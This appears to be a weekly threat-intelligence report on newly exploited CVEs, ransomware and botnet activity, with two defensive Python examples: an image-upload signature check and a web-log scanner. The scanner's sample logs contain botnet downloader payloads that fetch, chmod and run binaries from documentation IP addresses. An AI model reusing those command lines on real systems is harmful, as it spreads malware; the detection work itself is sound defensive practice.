This week has been very critical, with CISA adding seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Among these are four Microsoft-related issues: CVE-2024-38226, CVE-2024-43491, CVE-2024-38014, and CVE-2024-38217. These vulnerabilities, addressed in Microsoft’s latest Patch Tuesday update, pose significant risks if not swiftly patched, underscoring the urgent need for system updates to thwart potential attacks.
In addition, CISA has included two older yet still critical vulnerabilities: CVE-2017-1000253, a serious Linux Kernel flaw, and CVE-2016-3714, an issue with ImageMagick software. The addition of these historic vulnerabilities highlights their ongoing threat, particularly to critical infrastructure that may remain unpatched. This week’s updates emphasize the need for vigilant security practices and comprehensive updates for both current and legacy vulnerabilities across all systems.
The notorious Akira ransomware has been actively exploiting CVE-2024-40766, a critical vulnerability in SonicWall Firewalls, to gain initial access to victims' systems. Similarly, the APT-41 threat actor has been deploying the SideWalk trojan malware, which targets a critical vulnerability in OSGeo GeoServer GeoTools.
The Mirai botnet continues its aggressive exploitation, targeting LB-Link BL devices, TP-Link Archer AX21 routers, and Avtech Security cameras. Notably, variants of Mirai such as Condi and JenX are leveraging a critical vulnerability in OSGeo GeoServer GeoTools. Additionally, the Sysrv and Enemy botnets are exploiting vulnerabilities in Spring Cloud Gateway and Huawei HG532 devices. The IoT_Reaper botnet remains active, persistently exploiting an eight-year-old vulnerability in MVPower CCTV DVR models.
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
A recently disclosed Windows Installer vulnerability, identified as CVE-2024-38014, poses a severe threat by allowing attackers to elevate their privileges to SYSTEM level without requiring user input. With a CVSS score of 7.8 and an EPSS score of 0.00146, this high-severity vulnerability has been added to the CISA KEV catalog.
A security feature bypass vulnerability in Windows Mark-of-the-Web (MotW), tracked as CVE-2024-38217, has an EPSS score of 0.00382. Exploiting it could defeat the Mark of the Web protections, enabling unauthorized actions on the user's system. Microsoft describes the impact as a "limited compromise," affecting the integrity and availability of application reputation checks and other security features. This vulnerability has been added to the CISA KEV catalog.
Recently added to the CISA KEV catalog, a security feature bypass vulnerability in Microsoft Publisher, rated with a low EPSS score of 0.00144, enables attackers to evade Office macro policies. This vulnerability poses a significant risk by allowing the execution of untrusted or malicious files, which could compromise system security.
Yet another remote code execution vulnerability in Microsoft Windows, identified as CVE-2024-43491, has an EPSS score of 0.00712 and a high CVSS score of 9.8. This critical flaw allows attackers to exploit previously mitigated vulnerabilities in Windows 10, version 1507. The issue involves a rollback of fixes that Microsoft had implemented between March and August for certain versions of Windows 10. This vulnerability has been added to the CISA KEV catalog, highlighting its significant threat to system security.
A vulnerability in HAProxy, with an EPSS score of 0.00858 and a CVSS score of 7.8, can create an endless loop under certain conditions, potentially causing a system crash and enabling remote denial-of-service (DoS) attacks. This issue arises from a flaw in the HTTP/2 multiplexer, particularly when used with zero-copy forwarding designed to optimize data transfer. In rare cases, attackers can exploit this vulnerability to initiate an infinite loop in the h2_send() function.
An improper access control vulnerability in SonicWall SonicOS, impacting both management access and SSLVPN, can grant unauthorized access to system resources and, in some cases, cause a firewall crash. With a CVSS score of 9.3 and an EPSS score of 0.01179, this vulnerability poses a serious security risk and has been added to the CISA KEV catalog.
A high-severity stack-based buffer overflow vulnerability in the Linux Kernel, rated CVSS 7.8 and EPSS 0.06297, allows local attackers to escalate privileges. Recently included in the CISA KEV catalog and with a publicly available proof of concept (PoC), this vulnerability has been historically exploited by DarkRadiation ransomware and the Libprocesshider rootkit, representing a serious security risk.
Discovered eight years ago, an improper input validation flaw in ImageMagick allows attackers to run arbitrary code by embedding malicious shell metacharacters in images. The vulnerability, rated with a CVSS score of 8.4 and a high EPSS score of 0.97355, poses a significant security threat and has recently been added to the CISA KEV catalog.
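The ImageMagick flaw above works because ImageMagick chooses a decoder from the file's content rather than its name, so a text-based format disguised as a JPEG is still parsed as that text format. The standard defensive control is to allowlist uploads by their magic bytes before anything reaches the converter. The following is an added example (not ImageMagick's or Loginsoft's code); the accepted format list, the helper names and the sample files are constructed for illustration.

```python
"""Check that an uploaded "image" really is the raster format its name claims.

Added example, not ImageMagick's or any project's code. The upload endpoint
is assumed to accept only PNG, JPEG and GIF; a file is accepted only when the
magic bytes and the file extension agree on one of those formats.
"""
import os

# Signatures of the only formats the upload endpoint accepts (assumption).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Extension spellings that map to the same format.
ALIASES = {"jpeg": "jpg"}


def sniff_image_type(data: bytes):
    """Return the format name whose signature opens `data`, else None."""
    for name, sig in MAGIC.items():
        if data[: len(sig)] == sig:
            return name
    return None


def accept_upload(filename: str, data: bytes) -> bool:
    """True only if the content signature and the extension name the same allowed format."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    ext = ALIASES.get(ext, ext)
    kind = sniff_image_type(data)
    return kind is not None and kind == ext


# Constructed sample files (headers only; these bytes are not real pictures).
SAMPLES = {
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR",
    "photo.jpeg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    # Text-based format carrying a .jpg name: the classic disguise.
    "disguised.jpg": b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"/>',
    # Real JPEG bytes under a .png name: extension and content disagree.
    "renamed.png": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
}


def triage(samples=SAMPLES):
    """Decide every sample; returns {filename: accepted?}."""
    return {name: accept_upload(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, ok in triage().items():
        print(f"{name:15} {'accept' if ok else 'reject'}")
```

Only the two well-formed samples pass; the disguised SVG and the mislabelled JPEG are rejected before any converter sees them. Pairing this check with ImageMagick's security policy (policy.xml), which disables coders the application does not need, is the layered mitigation the project documents.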
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presenting the top 5 CVEs with payloads suggestive of botnet activity, such as using wget with raw IP addresses.
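The heuristic mentioned above, a fetch tool pointed at a bare IP address inside a request payload, is easy to apply to ordinary web-server logs. The following is an added example, not Loginsoft's sensor code: it parses constructed combined-format access-log lines (documentation IP ranges, invented paths), URL-decodes each request, and reports requests whose payload contains wget, curl or tftp followed by an IPv4 address, noting whether the payload also chmods or executes what it fetched.

```python
"""Flag HTTP request lines whose payload looks like a botnet downloader stage.

Added example, not Loginsoft's sensor code. Log lines, hosts and paths are
constructed; the regexes implement the report's heuristic (a fetch tool plus a
bare IPv4 host) and are assumptions about what such a stager looks like.
"""
import re
from urllib.parse import unquote

# Combined log format: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
_IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# A fetch tool followed, within the same shell command, by a bare IPv4 host.
DOWNLOADER_RE = re.compile(
    rf"\b(?P<tool>wget|curl|tftp)\b[^;&|]*?(?P<ip>{_IPV4})", re.IGNORECASE
)
# Typical follow-up: mark the download executable and run it.
EXEC_RE = re.compile(
    r"\bchmod\s+(?:\+x|[0-7]{3,4})\b|\bsh\s+\S+|\./\S+", re.IGNORECASE
)

# Constructed sample log lines (TEST-NET addresses, invented CGI paths).
SAMPLE_LOG = """\
198.51.100.10 - - [10/Sep/2024:08:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2024:08:14:09 +0000] "GET /cgi-bin/test.cgi?cmd=cd+/tmp;wget+http://203.0.113.5/bins/arm7;chmod+777+arm7;./arm7 HTTP/1.1" 404 0 "-" "Hello, world"
198.51.100.44 - - [10/Sep/2024:08:15:31 +0000] "POST /api/upload HTTP/1.1" 200 17 "-" "curl/8.4.0"
198.51.100.51 - - [10/Sep/2024:08:16:00 +0000] "GET /setup.cgi?next_file=x&todo=%24%28curl%20-O%20http%3A%2F%2F203.0.113.9%3A8080%2Fx.sh%29 HTTP/1.1" 200 3 "-" "-"
"""


def decode_request(req: str) -> str:
    """Undo URL encoding; '+' is treated as a space (assumption: form-style encoding)."""
    return unquote(req.replace("+", " "))


def scan(lines):
    """Return one finding per request line that carries a downloader command.

    Only the request line is inspected, so a legitimate 'curl/8.4.0' User-Agent
    does not trigger a hit.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        decoded = decode_request(m.group("req"))
        hit = DOWNLOADER_RE.search(decoded)
        if not hit:
            continue
        findings.append({
            "src": m.group("src"),
            "ts": m.group("ts"),
            "tool": hit.group("tool").lower(),
            "ip": hit.group("ip"),
            "exec_chain": bool(EXEC_RE.search(decoded)),
            "request": decoded,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        stage = "fetch+exec" if f["exec_chain"] else "fetch only"
        print(f'{f["ts"]} {f["src"]} -> {f["tool"]} {f["ip"]} ({stage})')
```

On the sample data the first and third lines are clean, the second is a full fetch-chmod-execute chain from 203.0.113.5, and the fourth is a URL-encoded curl fetch from 203.0.113.9 with no execution step. In production the `ip` field is what you would pivot on (count distinct payload hosts per CVE path) to build a top-N table like the one the report presents.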
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from various sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
Recent investigations from Arctic Wolf revealed that a critical improper access control vulnerability in SonicWall Firewall is being exploited by Akira ransomware to gain initial access to the target systems. Akira ransomware, first identified in early 2023, operates under a Ransomware-as-a-Service (RaaS) model and is linked to threat actors such as GOLD SAHARA, PUNK SPIDER, and Storm-1567. It employs a double extortion tactic, exfiltrating data before encrypting victim systems, and demands Bitcoin payments for decryption or to prevent data leaks.
An eval injection vulnerability in GeoServer can lead to remote code execution and has been exploited by GOREVERSE malware. In certain cases, attackers have used this flaw to deploy SideWalk malware, a sophisticated backdoor linked to the APT41 threat group. Additionally, the vulnerability has been leveraged to distribute Mirai variants like JenX and the Condi DDoS bot.
It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.